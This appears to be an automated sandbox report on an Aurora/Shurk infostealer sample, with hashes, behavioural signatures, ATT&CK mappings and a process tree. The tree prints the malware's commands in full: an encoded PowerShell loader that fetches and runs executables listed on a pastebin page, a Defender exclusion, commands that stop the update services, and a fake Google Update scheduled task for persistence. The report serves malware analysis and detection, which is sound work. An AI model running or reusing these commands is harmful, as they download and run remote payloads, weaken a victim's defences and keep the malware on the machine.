aurora | 4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0

Analysis

max time kernel
59s
max time network
83s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
01-05-2023 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aurora.exe
Size

25.5MB
MD5

5b5049eee909a12420356f785890ee12
SHA1

2458920623ab942e1f564cb09ae25fb02b6b76a0
SHA256

4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
SHA512

5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
SSDEEP

98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF

Score

10^/10

aurora shurk evasion infostealer persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/tPAFrSUD

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5064-147-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

yvmwkzff.2sq1.exe

description	pid	process	target process
PID 4868 created 3152	4868	yvmwkzff.2sq1.exe	Explorer.EXE
PID 4868 created 3152	4868	yvmwkzff.2sq1.exe	Explorer.EXE
PID 4868 created 3152	4868	yvmwkzff.2sq1.exe	Explorer.EXE
PID 4868 created 3152	4868	yvmwkzff.2sq1.exe	Explorer.EXE
PID 4868 created 3152	4868	yvmwkzff.2sq1.exe	Explorer.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

17 3444 powershell.exe
19 3444 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

yvmwkzff.2sq1.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts yvmwkzff.2sq1.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
17	3444	powershell.exe
19	3444	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	yvmwkzff.2sq1.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Aurora.exeLXIX.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	Aurora.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	LXIX.exe

Executes dropped EXE 4 IoCs

Processes:

LXIX.exeyvmwkzff.2sq0.exeyvmwkzff.2sq1.exeyvmwkzff.2sq2.exe

pid process

1564 LXIX.exe
1036 yvmwkzff.2sq0.exe
4868 yvmwkzff.2sq1.exe
2740 yvmwkzff.2sq2.exe

pid	process
1564	LXIX.exe
1036	yvmwkzff.2sq0.exe
4868	yvmwkzff.2sq1.exe
2740	yvmwkzff.2sq2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

yvmwkzff.2sq2.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	yvmwkzff.2sq2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" "	yvmwkzff.2sq2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

yvmwkzff.2sq1.exe

description pid process target process

PID 4868 set thread context of 4232 4868 yvmwkzff.2sq1.exe dialer.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3264 sc.exe
3040 sc.exe
2652 sc.exe
3244 sc.exe
2552 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4868 set thread context of 4232	4868	yvmwkzff.2sq1.exe	dialer.exe

pid	process
3264	sc.exe
3040	sc.exe
2652	sc.exe
3244	sc.exe
2552	sc.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exeyvmwkzff.2sq1.exepowershell.exedialer.exepowershell.exe

pid	process
3444	powershell.exe
3444	powershell.exe
1844	powershell.exe
1844	powershell.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4328	powershell.exe
4328	powershell.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4868	yvmwkzff.2sq1.exe
4232	dialer.exe
4232	dialer.exe
1356	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exedialer.exepowercfg.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	4232	dialer.exe
Token: SeShutdownPrivilege	4208	powercfg.exe
Token: SeCreatePagefilePrivilege	4208	powercfg.exe
Token: SeDebugPrivilege	1356	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

Aurora.exeLXIX.exepowershell.execmd.exeyvmwkzff.2sq1.execmd.exe

description	pid	process	target process
PID 5064 wrote to memory of 1564	5064	Aurora.exe	LXIX.exe
PID 5064 wrote to memory of 1564	5064	Aurora.exe	LXIX.exe
PID 5064 wrote to memory of 1564	5064	Aurora.exe	LXIX.exe
PID 1564 wrote to memory of 3444	1564	LXIX.exe	powershell.exe
PID 1564 wrote to memory of 3444	1564	LXIX.exe	powershell.exe
PID 1564 wrote to memory of 3444	1564	LXIX.exe	powershell.exe
PID 3444 wrote to memory of 1844	3444	powershell.exe	powershell.exe
PID 3444 wrote to memory of 1844	3444	powershell.exe	powershell.exe
PID 3444 wrote to memory of 1844	3444	powershell.exe	powershell.exe
PID 3444 wrote to memory of 1036	3444	powershell.exe	yvmwkzff.2sq0.exe
PID 3444 wrote to memory of 1036	3444	powershell.exe	yvmwkzff.2sq0.exe
PID 3444 wrote to memory of 4868	3444	powershell.exe	yvmwkzff.2sq1.exe
PID 3444 wrote to memory of 4868	3444	powershell.exe	yvmwkzff.2sq1.exe
PID 3444 wrote to memory of 2740	3444	powershell.exe	yvmwkzff.2sq2.exe
PID 3444 wrote to memory of 2740	3444	powershell.exe	yvmwkzff.2sq2.exe
PID 4160 wrote to memory of 3244	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 3244	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 2552	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 2552	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 3264	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 3264	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 3040	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 3040	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 2652	4160	cmd.exe	sc.exe
PID 4160 wrote to memory of 2652	4160	cmd.exe	sc.exe
PID 4868 wrote to memory of 4232	4868	yvmwkzff.2sq1.exe	dialer.exe
PID 2116 wrote to memory of 4208	2116	cmd.exe	powercfg.exe
PID 2116 wrote to memory of 4208	2116	cmd.exe	powercfg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3152

C:\Users\Admin\AppData\Local\Temp\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064

C:\Users\Admin\AppData\Local\Temp\LXIX.exe
"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq0.exe
"C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq0.exe"
5⤵
- Executes dropped EXE
PID:1036

C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq1.exe
"C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq1.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4868

C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq2.exe
"C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq2.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
- Suspicious use of WriteProcessMemory
PID:4160

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3244

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2552

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3264

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3040

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2652

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4208

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4984

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:1004

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:1656

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
d584df872086c0f7442a664a33d38fe5

SHA1
f0fad100fda4e8bb82ce5bc7d03953605ac53a5d

SHA256
fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc

SHA512
5232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
4ba425722a957a847cb5008030b17992

SHA1
c732487f52fa541f7a78f77be5b28ba7607cabaa

SHA256
098127b8b1183500ca7d3c96b683f5c47fee58e8fffd61c0b700649bd1d12865

SHA512
411fc83b9c9c23acc077ba40c12b63f26305f52b2c054110155b40eeaa4166f4bb297ff2ef785b1dccf4772f578391fd4107e176730f1fcb1b52ac20edae6259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
4ba425722a957a847cb5008030b17992

SHA1
c732487f52fa541f7a78f77be5b28ba7607cabaa

SHA256
098127b8b1183500ca7d3c96b683f5c47fee58e8fffd61c0b700649bd1d12865

SHA512
411fc83b9c9c23acc077ba40c12b63f26305f52b2c054110155b40eeaa4166f4bb297ff2ef785b1dccf4772f578391fd4107e176730f1fcb1b52ac20edae6259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c697637a9b17f577fccd7e83a5495810

SHA1
04e6054584786b88994b0e0a871562227fe2a435

SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqt3ia2r.ylj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq0.exe
Filesize
3.9MB

MD5
83f3a86879eb7bbaca8b2ec9556452de

SHA1
230fa30edbb0dc758051f5fa32f5689a9cce8c63

SHA256
7cabb568cba602df4c51bcc522d3f3f199f2e7bec2c56a8585c5f1816a0eafb5

SHA512
289350bbf2f97e50b638272b41312e0f04f4d55d66ee9cb8da4830979b89dd4aba67b5474f78ebe2ce07cbe21b0f2ca632dd3d76e9b425b78b3bd91bf7ae6185

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq0.exe
Filesize
3.9MB

MD5
83f3a86879eb7bbaca8b2ec9556452de

SHA1
230fa30edbb0dc758051f5fa32f5689a9cce8c63

SHA256
7cabb568cba602df4c51bcc522d3f3f199f2e7bec2c56a8585c5f1816a0eafb5

SHA512
289350bbf2f97e50b638272b41312e0f04f4d55d66ee9cb8da4830979b89dd4aba67b5474f78ebe2ce07cbe21b0f2ca632dd3d76e9b425b78b3bd91bf7ae6185

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq0.exe
Filesize
3.9MB

MD5
83f3a86879eb7bbaca8b2ec9556452de

SHA1
230fa30edbb0dc758051f5fa32f5689a9cce8c63

SHA256
7cabb568cba602df4c51bcc522d3f3f199f2e7bec2c56a8585c5f1816a0eafb5

SHA512
289350bbf2f97e50b638272b41312e0f04f4d55d66ee9cb8da4830979b89dd4aba67b5474f78ebe2ce07cbe21b0f2ca632dd3d76e9b425b78b3bd91bf7ae6185

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq1.exe
Filesize
5.8MB

MD5
5f2f1ae240812065799e8c05d3a01aa7

SHA1
e14d1c6a64f27267c688b695da84b7a9527a3d13

SHA256
adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03

SHA512
d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq1.exe
Filesize
5.8MB

MD5
5f2f1ae240812065799e8c05d3a01aa7

SHA1
e14d1c6a64f27267c688b695da84b7a9527a3d13

SHA256
adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03

SHA512
d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq2.exe
Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq2.exe
Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\AppData\Roaming\yvmwkzff.2sq2.exe
Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
memory/428-327-0x0000017F82BD0000-0x0000017F82BF7000-memory.dmp

Filesize
156KB

Download
memory/428-321-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/428-318-0x0000017F82BD0000-0x0000017F82BF7000-memory.dmp

Filesize
156KB

Download
memory/580-322-0x0000022725800000-0x0000022725827000-memory.dmp

Filesize
156KB

Download
memory/580-301-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/580-300-0x0000022725800000-0x0000022725827000-memory.dmp

Filesize
156KB

Download
memory/580-298-0x00000227253C0000-0x00000227253E1000-memory.dmp

Filesize
132KB

Download
memory/664-324-0x0000022F40330000-0x0000022F40357000-memory.dmp

Filesize
156KB

Download
memory/664-305-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/664-302-0x0000022F40330000-0x0000022F40357000-memory.dmp

Filesize
156KB

Download
memory/708-361-0x0000027BC3FB0000-0x0000027BC3FD7000-memory.dmp

Filesize
156KB

Download
memory/708-329-0x0000027BC3FB0000-0x0000027BC3FD7000-memory.dmp

Filesize
156KB

Download
memory/708-330-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/900-336-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/900-365-0x0000025F23DB0000-0x0000025F23DD7000-memory.dmp

Filesize
156KB

Download
memory/900-334-0x0000025F23DB0000-0x0000025F23DD7000-memory.dmp

Filesize
156KB

Download
memory/940-337-0x000001BFD3740000-0x000001BFD3767000-memory.dmp

Filesize
156KB

Download
memory/940-366-0x000001BFD3740000-0x000001BFD3767000-memory.dmp

Filesize
156KB

Download
memory/940-339-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/944-325-0x000001A15FA10000-0x000001A15FA37000-memory.dmp

Filesize
156KB

Download
memory/944-309-0x000001A15FA10000-0x000001A15FA37000-memory.dmp

Filesize
156KB

Download
memory/944-313-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1016-311-0x00000271714F0000-0x0000027171517000-memory.dmp

Filesize
156KB

Download
memory/1016-326-0x00000271714F0000-0x0000027171517000-memory.dmp

Filesize
156KB

Download
memory/1016-314-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1112-340-0x00000171547C0000-0x00000171547E7000-memory.dmp

Filesize
156KB

Download
memory/1112-341-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1112-368-0x00000171547C0000-0x00000171547E7000-memory.dmp

Filesize
156KB

Download
memory/1152-369-0x000001A462140000-0x000001A462167000-memory.dmp

Filesize
156KB

Download
memory/1152-348-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1152-346-0x000001A462140000-0x000001A462167000-memory.dmp

Filesize
156KB

Download
memory/1216-373-0x0000021488F20000-0x0000021488F47000-memory.dmp

Filesize
156KB

Download
